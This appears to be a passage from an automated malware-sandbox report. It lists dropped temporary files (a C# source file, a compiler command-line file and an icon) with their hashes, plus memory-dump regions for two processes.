    SHA512 9d5c096a9f29dda6dc1618cbfeb1cef289406b9a24b557e26abe75b18c233ec05f0a29d79ef663a01743fe9fb71325f03e41fb8964791a2026b7f5ea9166410d

  • \??\c:\Users\Admin\AppData\Local\Temp\ik4g2jej\ik4g2jej.0.cs
    Filesize 1KB
    MD5 b13ca430c010150409bf9135f8fa3b45
    SHA1 c79083f6c625d77c3c8682f6e0085fd1cc2379f2
    SHA256 68d1e7fa040c4ce855237670de6ee6525786f5666f0eb2e578dffb5fe4427738
    SHA512 ab67cb6a49aecb5c039a540d904ceec3d5b2c0747a728ce15f32a76dc5fb35e076dfab9afb23eed27dda9767f548706980e17b5706dc00dfd9f8df6c59d8266e

  • \??\c:\Users\Admin\AppData\Local\Temp\ik4g2jej\ik4g2jej.cmdline
    Filesize 236B
    MD5 fbcd21da75febe8553e60225e5d527e0
    SHA1 4dab6e2d0811b81ff1f83482d6e4dcb9abc87cdb
    SHA256 cc262d7d4cc060d1ef7e937a4e77b792d84636aa13727a08b4b6420dbe283288
    SHA512 0e199d2b3ae38ecd128beb0f0ba396d8d59c0383c5b8da23bb4a53783d2e6395284bcdb85d4871939a8eceab7a642e9210e700ef73cab22abf940d9c665ce54b

  • \??\c:\Users\Admin\AppData\Local\Temp\vckxk5dv.ico
    Filesize 27KB
    MD5 dbc49b5f7714255217080c2e81f05a99
    SHA1 4de2ef415d66d2bb8b389ba140a468b125388e19
    SHA256 6d2f1f6164cbd331b9dc43b37948372e21b2ee45407aa99e199693835cded09c
    SHA512 29a65eb7403bfc220fd057c2e6ea11b29bff545dfce2d3370ad462c66b03ae7f648efd480305423a49440de199a2a94c41214877b226a42dc2d1650683d149bb

  • memory/1772-16-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp
    Filesize 10.8MB

  • memory/1772-103-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp
    Filesize 10.8MB

  • memory/1772-102-0x00007FFA7BF23000-0x00007FFA7BF25000-memory.dmp
    Filesize 8KB

  • memory/1772-18-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp
    Filesize 10.8MB

  • memory/1772-17-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp
    Filesize 10.8MB

  • memory/1772-15-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp
    Filesize 10.8MB

  • memory/1772-14-0x000000001BB70000-0x000000001BBE6000-memory.dmp
    Filesize 472KB

  • memory/1772-13-0x0000000000080000-0x0000000000102000-memory.dmp
    Filesize 520KB

  • memory/1772-12-0x00007FFA7BF23000-0x00007FFA7BF25000-memory.dmp
    Filesize 8KB

  • memory/4548-105-0x0000000000400000-0x000000000041B000-memory.dmp
    Filesize 108KB

  • memory/4548-107-0x0000000000400000-0x000000000041B000-memory.dmp
    Filesize 108KB

  • memory/4548-104-0x0000000000400000-0x000000000041B000-memory.dmp
    Filesize 108KB